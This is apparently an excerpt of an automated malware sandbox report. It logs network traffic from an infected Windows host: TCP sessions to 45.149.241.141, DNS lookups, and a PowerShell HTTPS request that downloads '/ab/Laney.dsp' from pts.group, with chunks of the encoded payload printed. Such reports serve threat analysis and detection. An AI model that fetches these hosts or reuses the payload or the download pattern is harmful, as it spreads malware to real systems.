                                                                                                              Dec 5, 2024 10:40:05.318509102 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.318563938 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:05.318619013 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.319504976 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.319572926 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:05.319602013 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.320410013 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.320485115 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:05.320494890 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.321420908 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.321491003 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:05.321516991 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.322314024 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.322369099 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:05.566154957 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:05.685796022 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:05.685888052 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:05.805572033 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:06.096729994 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:06.096761942 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:06.096870899 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:06.096910954 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:06.096929073 CET499522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:06.216625929 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:06.216667891 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:06.216723919 CET20234995245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:06.453629017 CET49973443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:06.453692913 CET4434997345.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:06.453896999 CET49973443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:06.454047918 CET49973443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:06.454061985 CET4434997345.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:07.835731030 CET4434997345.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:07.835848093 CET49973443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:07.840430021 CET49973443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:07.840435982 CET4434997345.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:07.840740919 CET4434997345.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:07.842211962 CET49973443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:07.887335062 CET4434997345.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:12.627662897 CET4434997345.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:12.627746105 CET4434997345.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:12.627804995 CET49973443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:12.627849102 CET49973443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:12.627868891 CET4434997345.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:13.625452995 CET49994443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:13.625509024 CET4434999445.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:13.625597954 CET49994443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:13.625662088 CET49994443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:13.625674009 CET4434999445.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:15.002262115 CET4434999445.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:15.002356052 CET49994443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:15.007340908 CET49994443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:15.007375956 CET4434999445.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:15.007735014 CET4434999445.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:15.010731936 CET49994443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:15.055332899 CET4434999445.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:19.799473047 CET4434999445.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:19.799580097 CET4434999445.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:19.799643040 CET49994443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:19.799694061 CET49994443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:19.799710989 CET4434999445.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:20.813141108 CET50001443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:20.813184023 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:20.813261986 CET50001443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:20.813380003 CET50001443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:20.813393116 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:22.182774067 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:22.182894945 CET50001443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:22.187123060 CET50001443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:22.187139034 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:22.187550068 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:22.188437939 CET50001443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:22.235330105 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:26.980041027 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:26.980124950 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:26.980181932 CET50001443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:26.980297089 CET50001443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:26.980315924 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:26.980353117 CET50001443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:26.980359077 CET4435000145.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:27.984968901 CET50002443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:27.985034943 CET4435000245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:27.985111952 CET50002443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:27.985194921 CET50002443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:27.985207081 CET4435000245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:29.362360954 CET4435000245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:40:29.362504959 CET50002443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:29.362600088 CET50002443192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:40:29.362638950 CET50002443192.168.2.745.149.241.141

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 5, 2024 10:38:29.360678911 CET6448653192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:38:29.500754118 CET53644861.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:13.117463112 CET5402253192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:13.255968094 CET53540221.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:33.917929888 CET5986053192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:33.918221951 CET5239753192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:33.918437958 CET6243053192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:33.918469906 CET6291053192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:33.918670893 CET5010853192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:33.918683052 CET5273253192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:33.919271946 CET6066753192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:34.056605101 CET53501081.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:34.058006048 CET53606671.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:34.146434069 CET53624301.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:34.288649082 CET53629101.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:34.570290089 CET53598601.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:34.605050087 CET53523971.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:34.717698097 CET53527321.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:34.745388985 CET60668123192.168.2.762.149.0.30
                                                                                                              Dec 5, 2024 10:39:34.745445013 CET60668123192.168.2.7194.58.203.20
                                                                                                              Dec 5, 2024 10:39:34.745485067 CET60668123192.168.2.7213.239.239.164
                                                                                                              Dec 5, 2024 10:39:34.745536089 CET60668123192.168.2.761.205.120.130
                                                                                                              Dec 5, 2024 10:39:34.745575905 CET60668123192.168.2.7162.159.200.1
                                                                                                              Dec 5, 2024 10:39:35.828319073 CET12360668162.159.200.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:35.923460007 CET12360668194.58.203.20192.168.2.7
                                                                                                              Dec 5, 2024 10:39:35.923829079 CET12360668213.239.239.164192.168.2.7
                                                                                                              Dec 5, 2024 10:39:35.934470892 CET1236066862.149.0.30192.168.2.7
                                                                                                              Dec 5, 2024 10:39:36.018321037 CET1236066861.205.120.130192.168.2.7
                                                                                                              Dec 5, 2024 10:39:41.437010050 CET53540981.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:41.700170994 CET53584421.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.101310015 CET5899553192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:48.101459980 CET5304253192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:48.101798058 CET5017053192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:48.101924896 CET6034553192.168.2.71.1.1.1
                                                                                                              Dec 5, 2024 10:39:48.238683939 CET53589951.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.238882065 CET53603451.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.238945961 CET53501701.1.1.1192.168.2.7
                                                                                                              Dec 5, 2024 10:39:48.240792990 CET53530421.1.1.1192.168.2.7

                                                                                                              ICMP Packets

                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                              Dec 5, 2024 10:39:41.799027920 CET192.168.2.71.1.1.1c236(Port unreachable)Destination Unreachable

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 5, 2024 10:38:29.360678911 CET192.168.2.71.1.1.10xd41eStandard query (0)pts.groupA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:13.117463112 CET192.168.2.71.1.1.10xa324Standard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:33.917929888 CET192.168.2.71.1.1.10xec7aStandard query (0)ts1.aco.netA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:33.918221951 CET192.168.2.71.1.1.10xa7d1Standard query (0)gbg1.ntp.seA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:33.918437958 CET192.168.2.71.1.1.10x8754Standard query (0)ntp1.hetzner.deA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:33.918469906 CET192.168.2.71.1.1.10x1f1eStandard query (0)time.facebook.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:33.918670893 CET192.168.2.71.1.1.10xbd7bStandard query (0)time.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:33.918683052 CET192.168.2.71.1.1.10x663eStandard query (0)ntp.time.in.uaA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:33.919271946 CET192.168.2.71.1.1.10xe111Standard query (0)ntp.nict.jpA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.101310015 CET192.168.2.71.1.1.10x9232Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.101459980 CET192.168.2.71.1.1.10xefc2Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.101798058 CET192.168.2.71.1.1.10x990Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.101924896 CET192.168.2.71.1.1.10xdb4bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 5, 2024 10:38:29.500754118 CET1.1.1.1192.168.2.70xd41eNo error (0)pts.group68.66.226.116A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:13.255968094 CET1.1.1.1192.168.2.70xa324No error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:13.255968094 CET1.1.1.1192.168.2.70xa324No error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.056605101 CET1.1.1.1192.168.2.70xbd7bNo error (0)time.cloudflare.com162.159.200.1A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.056605101 CET1.1.1.1192.168.2.70xbd7bNo error (0)time.cloudflare.com162.159.200.123A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.058006048 CET1.1.1.1192.168.2.70xe111No error (0)ntp.nict.jp61.205.120.130A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.058006048 CET1.1.1.1192.168.2.70xe111No error (0)ntp.nict.jp133.243.238.164A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.058006048 CET1.1.1.1192.168.2.70xe111No error (0)ntp.nict.jp133.243.238.244A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.058006048 CET1.1.1.1192.168.2.70xe111No error (0)ntp.nict.jp133.243.238.243A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.058006048 CET1.1.1.1192.168.2.70xe111No error (0)ntp.nict.jp133.243.238.163A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.146434069 CET1.1.1.1192.168.2.70x8754No error (0)ntp1.hetzner.de213.239.239.164A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.288649082 CET1.1.1.1192.168.2.70x1f1eNo error (0)time.facebook.com129.134.25.123A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.570290089 CET1.1.1.1192.168.2.70xec7aServer failure (2)ts1.aco.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.605050087 CET1.1.1.1192.168.2.70xa7d1No error (0)gbg1.ntp.segbg1.ntp.netnod.seCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.605050087 CET1.1.1.1192.168.2.70xa7d1No error (0)gbg1.ntp.netnod.se194.58.203.20A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:34.717698097 CET1.1.1.1192.168.2.70x663eNo error (0)ntp.time.in.ua62.149.0.30A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.238683939 CET1.1.1.1192.168.2.70x9232No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.238683939 CET1.1.1.1192.168.2.70x9232No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.238882065 CET1.1.1.1192.168.2.70xdb4bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.238945961 CET1.1.1.1192.168.2.70x990No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.238945961 CET1.1.1.1192.168.2.70x990No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:48.240792990 CET1.1.1.1192.168.2.70xefc2No error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • pts.group
                                                                                                              • www.tdejb.com

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.74973068.66.226.1164437696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:30 UTC165OUTGET /ab/Laney.dsp HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                              Host: pts.group
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-05 09:38:31 UTC530INHTTP/1.1 200 OK
                                                                                                              Connection: close
                                                                                                              content-type: application/octet-stream
                                                                                                              last-modified: Thu, 05 Dec 2024 00:23:29 GMT
                                                                                                              accept-ranges: bytes
                                                                                                              content-length: 440292
                                                                                                              date: Thu, 05 Dec 2024 09:38:31 GMT
                                                                                                              server: LiteSpeed
                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                              x-content-type-options: nosniff
                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 36 77 4a 6f 5a 6e 45 42 6d 37 76 59 39 77 6b 41 36 77 4c 55 6a 4f 73 43 50 6b 55 44 58 43 51 45 63 51 47 62 63 51 47 62 75 62 6b 44 59 6f 72 72 41 6c 4e 49 36 77 49 4b 74 49 48 78 75 50 56 76 35 58 45 42 6d 33 45 42 6d 34 48 42 2f 77 6e 79 6b 4f 73 43 6f 6c 64 78 41 5a 74 78 41 5a 74 78 41 5a 75 36 4d 67 57 42 57 65 73 43 53 37 66 72 41 70 53 4d 63 51 47 62 36 77 49 4f 34 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4c 72 41 67 39 45 63 51 47 62 67 38 45 45 36 77 4c 69 76 4f 73 43 45 46 43 42 2b 65 67 61 2f 77 4e 38 7a 4f 73 43 6a 4d 44 72 41 74 2b 79 69 30 51 6b 42 4f 73 43 74 57 50 72 41 6c 31 35 69 63 4e 78 41 5a 76 72 41 73 43 34 67 63 4f 69 38 32 63 41 36 77 49 4c 57 58 45 42 6d 37 6f 62 6c 6f 50 4e 36 77 49 58 41 6e 45
                                                                                                              Data Ascii: 6wJoZnEBm7vY9wkA6wLUjOsCPkUDXCQEcQGbcQGbubkDYorrAlNI6wIKtIHxuPVv5XEBm3EBm4HB/wnykOsColdxAZtxAZtxAZu6MgWBWesCS7frApSMcQGb6wIO4zHKcQGbcQGbiRQLcQGbcQGb0eLrAg9EcQGbg8EE6wLivOsCEFCB+ega/wN8zOsCjMDrAt+yi0QkBOsCtWPrAl15icNxAZvrAsC4gcOi82cA6wILWXEBm7obloPN6wIXAnE
                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 58 52 45 6f 74 61 6b 32 42 48 53 76 33 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                              Data Ascii: XREotak2BHSv3wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 57 4f 6e 58 6a 4d 56 65 74 78 62 2b 78 4e 72 30 57 4b 71 34 50 39 4a 65 72 77 36 6a 32 48 6b 6c 4d 31 61 67 64 4a 64 43 78 59 62 61 39 55 33 56 43 2f 53 30 6d 41 36 65 43 53 74 4c 2b 51 55 54 68 55 56 4a 4d 44 62 54 70 34 67 49 4c 59 61 36 48 62 68 63 54 41 45 6f 77 79 2f 4b 56 30 32 64 4b 37 51 53 31 71 43 38 65 62 66 33 75 58 6d 33 38 46 36 70 62 4b 52 6b 54 62 6b 50 50 33 4d 4b 37 37 33 31 65 65 32 65 75 47 65 30 53 53 68 34 37 71 71 49 46 75 6e 45 66 79 6a 4d 64 4d 34 38 41 33 59 43 39 46 36 6b 68 42 52 2b 45 39 70 75 70 58 6e 66 76 77 4c 66 4e 7a 76 43 74 4b 59 47 2f 65 61 59 74 49 6b 5a 32 38 44 55 52 4f 38 6b 6f 4e 35 33 51 71 2f 66 51 48 57 76 33 30 42 31 72 39 39 41 43 55 6b 54 6a 75 70 65 4e 75 66 75 6e 58 6e 61 64 38 52 67 76 6d 68 6f 4c 39 6f
                                                                                                              Data Ascii: WOnXjMVetxb+xNr0WKq4P9Jerw6j2HklM1agdJdCxYba9U3VC/S0mA6eCStL+QUThUVJMDbTp4gILYa6HbhcTAEowy/KV02dK7QS1qC8ebf3uXm38F6pbKRkTbkPP3MK7731ee2euGe0SSh47qqIFunEfyjMdM48A3YC9F6khBR+E9pupXnfvwLfNzvCtKYG/eaYtIkZ28DURO8koN53Qq/fQHWv30B1r99ACUkTjupeNufunXnad8RgvmhoL9o
                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 74 5a 61 39 6f 47 6c 34 6b 49 71 66 55 4d 55 42 72 74 39 41 6e 56 38 34 51 48 57 67 33 68 31 31 72 39 39 41 64 61 2f 66 51 48 57 76 33 30 41 6a 4f 75 37 32 4d 59 66 45 45 52 49 7a 64 39 65 31 6e 52 30 6f 65 36 33 49 44 69 51 57 73 69 38 4e 75 56 36 78 65 4f 52 58 30 76 52 65 76 32 57 46 4b 34 7a 63 2f 45 7a 57 53 2b 6a 4a 57 72 67 46 6f 36 42 51 58 55 71 55 75 43 42 58 76 74 79 6d 46 6e 6f 61 73 69 78 62 76 53 36 58 42 68 6d 35 65 62 6c 4e 7a 45 43 50 75 53 62 6c 62 56 35 4b 59 39 77 65 61 4e 46 44 4b 5a 4e 54 58 6e 52 52 6e 5a 48 64 38 53 37 72 5a 4b 50 52 4a 67 6f 6d 46 46 6b 54 38 36 31 65 73 34 4e 53 57 53 54 30 58 45 32 36 6b 67 68 65 73 37 38 6b 77 75 37 30 52 43 39 32 6a 38 42 57 65 78 4a 39 52 71 51 41 2f 48 54 4f 5a 70 47 6f 75 71 62 79 4f 57 43
                                                                                                              Data Ascii: tZa9oGl4kIqfUMUBrt9AnV84QHWg3h11r99Ada/fQHWv30AjOu72MYfEERIzd9e1nR0oe63IDiQWsi8NuV6xeORX0vRev2WFK4zc/EzWS+jJWrgFo6BQXUqUuCBXvtymFnoasixbvS6XBhm5eblNzECPuSblbV5KY9weaNFDKZNTXnRRnZHd8S7rZKPRJgomFFkT861es4NSWST0XE26kghes78kwu70RC92j8BWexJ9RqQA/HTOZpGouqbyOWC
                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 72 39 39 41 64 61 2f 66 51 48 57 76 74 6d 47 6d 30 70 72 6a 36 57 58 4b 74 43 5a 32 4f 77 7a 75 45 43 57 77 39 46 6e 6c 44 55 73 54 69 50 39 45 34 58 4b 54 39 46 67 69 79 68 50 4b 58 72 65 65 77 52 6f 37 39 46 6a 55 55 6d 62 64 58 6f 65 68 35 7a 30 41 4a 6a 4e 57 6f 33 53 55 51 6e 6d 75 32 73 54 59 77 59 51 37 6b 71 2b 78 77 57 78 74 2f 68 6e 4b 49 78 6e 43 57 38 72 67 76 45 37 74 37 4e 63 63 58 53 73 6a 4a 6b 78 32 68 48 69 43 38 42 50 35 69 6d 55 75 6d 2b 32 6b 4c 71 6e 31 45 58 72 35 6c 76 4e 51 62 31 61 78 58 6f 5a 46 47 32 68 65 4a 78 55 56 72 33 65 76 58 71 6f 6d 68 56 6c 64 39 46 33 70 34 54 41 38 58 72 4b 66 51 77 52 4a 39 47 32 4b 4f 47 67 6f 69 64 7a 38 53 64 5a 57 36 43 73 66 4f 6c 4a 56 58 4b 6b 37 53 4f 76 64 55 63 73 59 63 72 4e 31 6f 6d 70
                                                                                                              Data Ascii: r99Ada/fQHWvtmGm0prj6WXKtCZ2OwzuECWw9FnlDUsTiP9E4XKT9FgiyhPKXreewRo79FjUUmbdXoeh5z0AJjNWo3SUQnmu2sTYwYQ7kq+xwWxt/hnKIxnCW8rgvE7t7NccXSsjJkx2hHiC8BP5imUum+2kLqn1EXr5lvNQb1axXoZFG2heJxUVr3evXqomhVld9F3p4TA8XrKfQwRJ9G2KOGgoidz8SdZW6CsfOlJVXKk7SOvdUcsYcrN1omp
                                                                                                              2024-12-05 09:38:31 UTC16384INData Raw: 72 38 42 50 77 55 65 65 76 2f 6a 31 33 55 42 31 32 69 6a 45 76 75 35 65 50 51 46 78 2b 45 42 31 6f 46 74 74 70 31 41 67 68 33 53 2f 4a 4a 67 54 4c 76 5a 51 39 65 47 64 4a 6b 78 74 58 6e 46 4c 37 39 51 42 38 58 78 65 63 51 62 39 48 6e 37 38 45 76 31 43 64 61 2b 4e 2b 72 54 2b 4c 6a 62 30 56 52 68 41 64 61 2f 51 78 50 6b 34 33 45 41 76 45 42 6c 4a 33 47 42 65 72 2b 35 75 76 4f 72 30 57 47 43 6e 37 64 56 65 68 77 58 2f 2f 65 44 77 62 74 36 35 2f 68 4c 39 51 6e 57 76 58 6a 30 46 30 79 70 41 64 61 42 62 6d 65 32 73 33 79 61 43 62 6f 51 6f 73 71 36 4a 4a 6a 74 59 75 63 57 76 4c 75 36 2b 39 34 64 75 75 50 53 65 56 43 62 37 6e 6c 35 70 37 71 34 37 48 50 77 61 48 30 46 31 72 79 6d 45 56 68 48 4a 72 4d 55 71 58 6f 62 79 51 45 56 37 39 46 6d 7a 62 5a 49 63 57 6f 6e
                                                                                                              Data Ascii: r8BPwUeev/j13UB12ijEvu5ePQFx+EB1oFttp1Agh3S/JJgTLvZQ9eGdJkxtXnFL79QB8XxecQb9Hn78Ev1Cda+N+rT+Ljb0VRhAda/QxPk43EAvEBlJ3GBer+5uvOr0WGCn7dVehwX//eDwbt65/hL9QnWvXj0F0ypAdaBbme2s3yaCboQosq6JJjtYucWvLu6+94duuPSeVCb7nl5p7q47HPwaH0F1rymEVhHJrMUqXobyQEV79FmzbZIcWon
